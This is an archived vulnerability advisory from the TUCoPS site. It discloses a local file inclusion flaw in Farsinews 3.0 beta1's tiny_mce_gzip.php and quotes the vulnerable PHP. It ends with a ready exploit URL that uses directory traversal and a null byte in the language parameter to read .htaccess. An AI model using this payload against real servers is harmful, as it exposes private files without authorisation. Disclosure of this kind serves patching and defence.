TUCoPS :: HP Unsorted F :: b06-3526.htm

Farsinews3.0beta1 local file inclusion
Local file inclusion in Farsinews3.0BETA1
Local file inclusion in Farsinews3.0BETA1


if magic_quotes_gpc is Off in php.ini then local file inclusion in /jscripts/tiny_mce/tiny_mce_gzip.php is available to use;)!!
why?
#code(jscripts/tiny_mce/tiny_mce_gzip.php)
...
        $theme = isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "";
        $language = isset($_REQUEST['language']) ? $_REQUEST['language'] : "";
        $plugins = isset($_REQUEST['plugins']) ? $_REQUEST['plugins'] : "";
...
        if ($theme) {
                // Write main script and patch some things
                echo file_get_contents(realpath("tiny_mce" . $suffix . ".js"));
                echo 'TinyMCE.prototype.loadScript = function() {};';
                echo "tinyMCE.init(TinyMCECompressed_settings);";

                // Load theme, language pack and theme language packs
                echo file_get_contents(realpath("themes/" . $theme . "/editor_template" . $suffix . ".js"));
                echo file_get_contents(realpath("themes/" . $theme . "/langs/" . $language . ".js"));
                echo file_get_contents(realpath("langs/" . $language . ".js"));

#exploit
for example!:
http://target/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced
...

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH